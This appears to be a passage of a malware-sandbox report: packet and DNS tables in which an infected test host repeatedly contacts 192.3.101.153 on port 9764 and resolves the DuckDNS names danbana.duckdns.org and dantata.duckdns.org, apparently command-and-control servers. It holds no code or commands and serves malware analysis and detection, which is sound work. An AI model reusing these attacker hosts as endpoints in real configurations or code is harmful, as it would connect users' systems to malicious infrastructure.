                                                                                Oct 17, 2024 16:05:23.006700993 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.006793022 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.006825924 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.006849051 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.006871939 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.006906033 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.006922960 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.006937981 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.006958008 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.006973028 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.006977081 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007002115 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007005930 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007018089 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007034063 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007050037 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007051945 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007066965 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007083893 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007160902 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007177114 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007193089 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007195950 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007210016 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007225990 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007227898 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007241964 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007262945 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007263899 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007288933 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007297039 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007306099 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007320881 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007335901 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007338047 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007350922 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007369995 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007375956 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007406950 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007411003 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007424116 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007447958 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007456064 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007463932 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007478952 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007499933 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007505894 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007522106 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007538080 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007543087 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007553101 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007567883 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007576942 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007592916 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007602930 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007612944 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007627964 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007642984 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007646084 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007658958 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007677078 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007682085 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007692099 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007708073 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007709980 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007724047 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007744074 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007760048 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007775068 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007790089 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007795095 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007807016 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007824898 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007832050 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007848978 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007858038 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007869959 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007885933 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.007906914 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.007994890 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008011103 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008024931 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008030891 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008039951 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008057117 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008059978 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008071899 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008088112 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008090973 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008105040 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008124113 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008596897 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008613110 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008630991 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008635998 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008657932 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008665085 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008676052 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008692026 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008708000 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008717060 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008744955 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008761883 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008776903 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008791924 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008806944 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008816004 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008822918 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008840084 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008850098 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008856058 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008872032 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008876085 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008888006 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008903027 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008910894 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008919001 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008939981 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008944988 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008963108 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008976936 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.008984089 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.008992910 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009007931 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009013891 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009023905 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009040117 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009047031 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009057045 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009068966 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009078026 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009105921 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009205103 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009524107 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009619951 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009634972 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009650946 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009654999 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009676933 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009685993 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009696007 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009711981 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009727955 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009731054 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009744883 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009758949 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009762049 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009790897 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009792089 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009807110 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009825945 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009841919 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009845018 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009859085 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009875059 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009877920 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009891033 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009907961 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.009910107 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.009941101 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.025188923 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.048688889 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.048707008 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.048738956 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.048757076 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.048774004 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.049009085 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.121429920 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121608973 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121627092 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121752024 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121767998 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121772051 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.121783018 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121798992 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121809006 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.121815920 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121828079 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.121831894 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121848106 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121850967 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.121862888 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121897936 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.121906042 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121918917 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121932983 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121943951 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.121948957 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121963978 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.121974945 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.122006893 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.122039080 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.122054100 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.122067928 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.122081995 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.122095108 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.122097015 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.122121096 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.122174025 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.122189999 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.122210026 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.123188972 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123203993 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123218060 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123231888 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123231888 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.123249054 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123253107 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.123264074 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123281956 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123282909 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.123325109 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.123339891 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123353958 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123375893 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123397112 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.123409033 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123423100 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123439074 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123442888 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.123476028 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.123483896 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123500109 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123534918 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.123816013 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123831034 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123845100 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123866081 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.123964071 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123979092 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.123994112 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.124005079 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.124011040 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:23.124033928 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.174093962 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:23.960644960 CEST8049731178.237.33.50192.168.2.5
                                                                                Oct 17, 2024 16:05:23.960716009 CEST4973180192.168.2.5178.237.33.50
                                                                                Oct 17, 2024 16:05:24.250863075 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:24.255937099 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.256021023 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:24.260915041 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.260982037 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:24.261779070 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.261850119 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:24.266251087 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.266274929 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.266338110 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:24.267321110 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.267333984 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.267402887 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:24.271281958 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.271321058 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.271332979 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.271348953 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:24.271379948 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.272248983 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.272346020 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.272357941 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.272396088 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.276501894 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.277679920 CEST976449730192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:24.277779102 CEST497309764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:31.863828897 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:05:31.865259886 CEST497279764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:05:31.872369051 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:06:01.878272057 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:06:01.881639957 CEST497279764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:06:01.886564970 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:06:31.896455050 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:06:31.901391983 CEST497279764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:06:31.906255007 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:06:56.658699989 CEST4973180192.168.2.5178.237.33.50
                                                                                Oct 17, 2024 16:06:56.978528023 CEST4973180192.168.2.5178.237.33.50
                                                                                Oct 17, 2024 16:06:57.681536913 CEST4973180192.168.2.5178.237.33.50
                                                                                Oct 17, 2024 16:06:58.881525040 CEST4973180192.168.2.5178.237.33.50
                                                                                Oct 17, 2024 16:07:01.295037031 CEST4973180192.168.2.5178.237.33.50
                                                                                Oct 17, 2024 16:07:01.915714025 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:07:01.917460918 CEST497279764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:07:01.924377918 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:07:06.143047094 CEST4973180192.168.2.5178.237.33.50
                                                                                Oct 17, 2024 16:07:15.752250910 CEST4973180192.168.2.5178.237.33.50
                                                                                Oct 17, 2024 16:07:31.941566944 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:07:31.944003105 CEST497279764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:07:31.949151039 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:08:01.972559929 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:08:02.018018007 CEST497279764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:08:02.220133066 CEST497279764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:08:02.225630045 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:08:32.030539036 CEST976449727192.3.101.153192.168.2.5
                                                                                Oct 17, 2024 16:08:32.031759977 CEST497279764192.168.2.5192.3.101.153
                                                                                Oct 17, 2024 16:08:32.036659002 CEST976449727192.3.101.153192.168.2.5
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 17, 2024 16:04:47.158632040 CEST6329653192.168.2.51.1.1.1
                                                                                Oct 17, 2024 16:04:47.220993996 CEST53632961.1.1.1192.168.2.5
                                                                                Oct 17, 2024 16:04:57.788824081 CEST5323553192.168.2.51.1.1.1
                                                                                Oct 17, 2024 16:04:58.801585913 CEST5323553192.168.2.51.1.1.1
                                                                                Oct 17, 2024 16:04:59.742085934 CEST53532351.1.1.1192.168.2.5
                                                                                Oct 17, 2024 16:05:03.126401901 CEST6156253192.168.2.51.1.1.1
                                                                                Oct 17, 2024 16:05:04.124479055 CEST6156253192.168.2.51.1.1.1
                                                                                Oct 17, 2024 16:05:04.805677891 CEST53615621.1.1.1192.168.2.5
                                                                                Oct 17, 2024 16:05:04.805850983 CEST53615621.1.1.1192.168.2.5
                                                                                Oct 17, 2024 16:05:06.663891077 CEST5245753192.168.2.51.1.1.1
                                                                                Oct 17, 2024 16:05:06.728346109 CEST53524571.1.1.1192.168.2.5
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 17, 2024 16:04:47.158632040 CEST192.168.2.51.1.1.10xeaf1Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:04:57.788824081 CEST192.168.2.51.1.1.10xf84Standard query (0)danbana.duckdns.orgA (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:04:58.801585913 CEST192.168.2.51.1.1.10xf84Standard query (0)danbana.duckdns.orgA (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:05:03.126401901 CEST192.168.2.51.1.1.10x5fc4Standard query (0)dantata.duckdns.orgA (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:05:04.124479055 CEST192.168.2.51.1.1.10x5fc4Standard query (0)dantata.duckdns.orgA (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:05:06.663891077 CEST192.168.2.51.1.1.10x1bb6Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 17, 2024 16:04:47.220993996 CEST1.1.1.1192.168.2.50xeaf1No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:04:47.220993996 CEST1.1.1.1192.168.2.50xeaf1No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:04:47.220993996 CEST1.1.1.1192.168.2.50xeaf1No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:04:47.220993996 CEST1.1.1.1192.168.2.50xeaf1No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:04:59.742085934 CEST1.1.1.1192.168.2.50xf84No error (0)danbana.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:05:04.805677891 CEST1.1.1.1192.168.2.50x5fc4No error (0)dantata.duckdns.org192.3.101.153A (IP address)IN (0x0001)false
